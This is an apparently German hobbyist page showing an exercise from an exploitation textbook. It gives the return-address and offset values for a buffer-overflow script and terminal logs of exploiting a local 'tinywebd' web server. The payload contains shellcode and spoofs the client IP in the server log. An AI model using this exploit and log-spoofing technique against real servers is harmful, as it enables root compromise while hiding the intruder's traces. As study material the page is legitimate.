s387 silent

Allgemein

Kapitel 3

Kapitel 4

Kapitel 5

Kapitel 6

Bitte die Werte in eurer .sh ändern

OFFSET=524
RETADDR="\x24\xf5\xff\xbf" # at +100 bytes from buffer @ 0xbffff4c0
FAKEADDR="\xcf\xf4\xff\xbf" # +15 bytes from buffer @ 0xbffff4c0

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./xt_slient.sh mark_restore 127.0.0.1
target IP: 127.0.0.1
shellcode: mark_restore (53 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 316] [shellcode 53] [ret addr 128] [*fake_addr 8]
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#

-------------- Terminal 2
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./tinywebd
Starting tiny web daemon..
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ps aux | grep tinywebd
root 2282 0.0 0.0 2180 368 ? Ss 22:13 0:00 ./tinywebd
root 2466 0.0 0.0 5924 840 pts/3 S+ 22:22 0:00 grep --color=auto tinywebd
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# strace -p 2282 -e trace=write
Process 2282 attached - interrupt to quit
write(2560, "09/14/2013 22:24:32> ", 21) = -1 EBADF (Bad file descriptor)
write(2560, "From 12.34.56.78:9090 \"GET / HTT"..., 54) = -1 EBADF (Bad file descriptor)
^CProcess 2282 detached

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# rm /Hacked
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./tinywebd
Starting tiny web daemon..
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ls -l /var/log/tinywebd.log
-rw------- 1 root root 6180 Sep 14 22:28 /var/log/tinywebd.log
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# chmod a+x ./xt_slient.sh
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./xt_slient.sh mark_restore 127.0.0.1
target IP: 127.0.0.1
shellcode: mark_restore (53 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 316] [shellcode 53] [ret addr 128] [*fake_addr 8]
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ls -l /var/lo
local/ lock/ log/
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ls -l /var/log/tinywebd.log
-rw------- 1 root root 6180 Sep 14 22:28 /var/log/tinywebd.log
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ls -l /Hacked
-rw------- 1 root root 0 Sep 14 22:30 /Hacked
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ps aux | grep tinywebd
root      2282 0.0 0.0   2180   368 ?        Ss   22:13   0:00 ./tinywebd
root      2604 0.0 0.0   5924   840 pts/3    S+   22:31   0:00 grep --color=auto tinywebd
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# strace -p 2282 -e trace=write
Process 2282 attached - interrupt to quit
write(1, "09/14/2013 22:34:22> ", 21)   = 21
write(1, "From 12.34.56.78:9090 \"GET / HTT"..., 54) = 54

^CProcess 2282 detached
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#

Websicherheit...

© ALLROUNDER